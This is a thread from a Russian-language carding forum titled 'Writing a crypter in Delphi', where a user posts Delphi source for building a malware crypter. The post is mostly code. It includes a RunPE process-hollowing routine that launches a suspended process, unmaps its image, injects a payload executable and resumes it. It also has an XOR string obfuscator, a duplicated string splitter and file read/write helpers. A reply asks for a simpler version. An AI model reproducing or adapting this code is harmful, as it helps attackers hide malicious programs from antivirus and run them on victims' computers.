1
  1. Этот сайт использует файлы cookie. Продолжая пользоваться данным сайтом, Вы соглашаетесь на использование нами Ваших файлов cookie. Узнать больше.
Приветствуем вас,Гость, на форуме IFUD.WS. Обязательно рекомендуется к прочтению правила форума http://ifud.ws/threads/obnovleno-pravila-foruma.7759

Пишем криптор на Delphi

Тема в разделе "Видеоуроки", создана пользователем OFF, 6 май 2014.

  1. TopicStarter Overlay
    usFire

    usFire

    Регистрация:
    20 авг 2012
    Сообщения:
    274
    Симпатии:
    177


    [RunPE] MemoryExecute

    Код:
    Function MemoryExecute(Buffer :Pointer;Parameters: String; Visible: Boolean): TProcessInformation;
    type
      HANDLE        = THandle;
      PVOID      = Pointer;
      LPVOID        = Pointer;
      SIZE_T        = Cardinal;
      ULONG_PTR  = Cardinal;
      NTSTATUS    = LongInt;
      LONG_PTR    = Integer;
     
      PImageSectionHeaders = ^TImageSectionHeaders;
      TImageSectionHeaders = Array [0..95] Of TImageSectionHeader;
    Var
      ZwUnmapViewOfSection  :Function(ProcessHandle: THANDLE; BaseAddress: Pointer): LongInt; stdcall;
      ProcessInfo          :TProcessInformation;
      StartupInfo          :TStartupInfo;
      Context              :TContext;
      BaseAddress          :Pointer;
      BytesRead          :DWORD;
      BytesWritten        :DWORD;
      I                  :ULONG;
      OldProtect            :ULONG;
      NTHeaders          :PImageNTHeaders;
      Sections            :PImageSectionHeaders;
      Success              :Boolean;
      ProcessName          :string;
     
    Function ImageFirstSection(NTHeader: PImageNTHeaders): PImageSectionHeader;
    Begin
      Result := PImageSectionheader( ULONG_PTR(@NTheader.OptionalHeader) +
                                    NTHeader.FileHeader.SizeOfOptionalHeader);
    End;
     
    Function Protect(Characteristics: ULONG): ULONG;
    Const
      Mapping      :Array[0..7] Of ULONG = (
                    PAGE_NOACCESS,
                    PAGE_EXECUTE,
                    PAGE_READONLY,
                    PAGE_EXECUTE_READ,
                    PAGE_READWRITE,
                    PAGE_EXECUTE_READWRITE,
                    PAGE_READWRITE,
                    PAGE_EXECUTE_READWRITE  );
    Begin
      Result := Mapping[ Characteristics SHR 29 ];
    End;
    Begin
      @ZwUnmapViewOfSection := GetProcAddress(LoadLibrary('ntdll.dll'), 'ZwUnmapViewOfSection');
      ProcessName := ParamStr(0);
     
      FillChar(ProcessInfo, SizeOf(TProcessInformation), 0);
      FillChar(StartupInfo, SizeOf(TStartupInfo),      0);
     
      StartupInfo.cb := SizeOf(TStartupInfo);
      StartupInfo.dwFlags := STARTF_USESHOWWINDOW;
      if Visible Then
        StartupInfo.wShowWindow := SW_NORMAL
      else
        StartupInfo.wShowWindow := SW_Hide;
     
      If (CreateProcess(PChar(ProcessName), PChar(Parameters), NIL, NIL,
                        False, CREATE_SUSPENDED, NIL, NIL, StartupInfo, ProcessInfo)) Then
      Begin
        Success := True;
        Result := ProcessInfo;
     
        Try
          Context.ContextFlags := CONTEXT_INTEGER;
          If (GetThreadContext(ProcessInfo.hThread, Context) And
            (ReadProcessMemory(ProcessInfo.hProcess, Pointer(Context.Ebx + 8),
                                @BaseAddress, SizeOf(BaseAddress), BytesRead)) And
            (ZwUnmapViewOfSection(ProcessInfo.hProcess, BaseAddress) >= 0) And
            (Assigned(Buffer))) Then
            Begin
              NTHeaders    := PImageNTHeaders(Cardinal(Buffer) + Cardinal(PImageDosHeader(Buffer)._lfanew));
              BaseAddress  := VirtualAllocEx(ProcessInfo.hProcess,
                                              Pointer(NTHeaders.OptionalHeader.ImageBase),
                                              NTHeaders.OptionalHeader.SizeOfImage,
                                              MEM_RESERVE or MEM_COMMIT,
                                              PAGE_READWRITE);
     
              If (Assigned(BaseAddress)) And
                  (WriteProcessMemory(ProcessInfo.hProcess, BaseAddress, Buffer,
                                      NTHeaders.OptionalHeader.SizeOfHeaders,
                                      BytesWritten)) Then
                  Begin
                    Sections := PImageSectionHeaders(ImageFirstSection(NTHeaders));
     
                    For I := 0 To NTHeaders.FileHeader.NumberOfSections -1 Do
                      If (WriteProcessMemory(ProcessInfo.hProcess,
                                            Pointer(Cardinal(BaseAddress) +
                                                    Sections.VirtualAddress),
                                            Pointer(Cardinal(Buffer) +
                                                    Sections.PointerToRawData),
                                            Sections.SizeOfRawData, BytesWritten)) Then
                        VirtualProtectEx(ProcessInfo.hProcess,
                                          Pointer(Cardinal(BaseAddress) +
                                                  Sections.VirtualAddress),
                                          Sections.Misc.VirtualSize,
                                          Protect(Sections.Characteristics),
                                          OldProtect);
     
     
                    If (WriteProcessMemory(ProcessInfo.hProcess,
                                          Pointer(Context.Ebx + 8), @BaseAddress,
                                          SizeOf(BaseAddress), BytesWritten)) Then
                      Begin
                        Context.EAX := ULONG(BaseAddress) +
                                        NTHeaders.OptionalHeader.AddressOfEntryPoint;
                        Success := SetThreadContext(ProcessInfo.hThread, Context);
                      End;
                  End;
            End;
        Finally
          If (Not Success) Then
            TerminateProcess(ProcessInfo.hProcess, 0)
          else
            ResumeThread(ProcessInfo.hThread);
        End;
      End;
    End;



    Cifrado XORizo by Metal



    Код:
    Function XORizo(Text, Pass: string): string;
    var
    i, p: integer;
    Res: string;
    begin
    p:= 1;
    for i:= 1 to Length(Text) do
    begin
    Res:= Res + Chr((Ord(Text) xor Length(Text)) XOR (Ord(Pass[p]) xor Length(Pass)));
    inc(p);
    if p > Length(Pass) then p:= 1;
    end;
    SetLength(Result, Length(Res));
    Result:= Res;
    end;
    



    SplitMetal by Metal [Arrays]



    Код:
    type
      TSarray = array of string;
     
    function SplitMetal(Texto, Delimitador: string): TSarray;
    var
      o: integer;
      PosDel: integer;
      Aux: string;
    begin
      o := 0;
      Aux := Texto;
      setlength(Result, length(Aux));
     
      repeat
        PosDel := Pos(Delimitador, Aux) - 1;
        if PosDel = -1 then
        begin
          Result[o] := Aux;
          break;
        end;
     
        Result[o] := copy(Aux, 1, PosDel);
        delete(Aux, 1, PosDel + length(Delimitador));
        inc(o);
      until Aux = '';
     
    end;


    Код:
    type
      TSarray = array of string;
     
    function SplitMetal(Texto, Delimitador: string): TSarray;
    var
      o: integer;
      PosDel: integer;
      Aux: string;
    begin
      o := 0;
      Aux := Texto;
      setlength(Result, length(Aux));
     
      repeat
        PosDel := Pos(Delimitador, Aux) - 1;
        if PosDel = -1 then
        begin
          Result[o] := Aux;
          break;
        end;
     
        Result[o] := copy(Aux, 1, PosDel);
        delete(Aux, 1, PosDel + length(Delimitador));
        inc(o);
      until Aux = '';
     
    end;

    mFileToStr by Metal


    Код:
    Function mFileToStr(Ruta: string): string;
    var
    sFile: HFile;
    uBytes: Cardinal;
    begin
    sFile:= _lopen(PChar(Ruta), OF_READ);
    uBytes:= GetFileSize(sFile, nil);
    SetLength(Result, uBytes);
    _lread(sfile, @result[1], uBytes);
    _lclose(sFile);
    end;
    mWriteFileFromStr by Metal


    Код:
    Procedure mWriteFileFromStr(Cadena, Ruta: string);
    var
    sFile: HFile;
    uBytes: Cardinal;
    begin
    sFile:= _lcreat(PChar(Ruta), 0);
    uBytes:= Length(Cadena);
    _lwrite(sFile, @Cadena[1], uBytes);
    _lclose(sFile);
    end;


    Код:
    procedure TForm1.Button1Click(Sender: TObject);
    begin
    mWriteFileFromStr('Me cago en tu puta madre', 'C:\jajajaja.com');
    end;
     
    • Like Like x 8
    Метки:
  2. Born

    Born

    Регистрация:
    19 янв 2013
    Сообщения:
    257
    Симпатии:
    147
    Сделай по легче.
     
    • Like Like x 1

Поделиться этой страницей

Загрузка...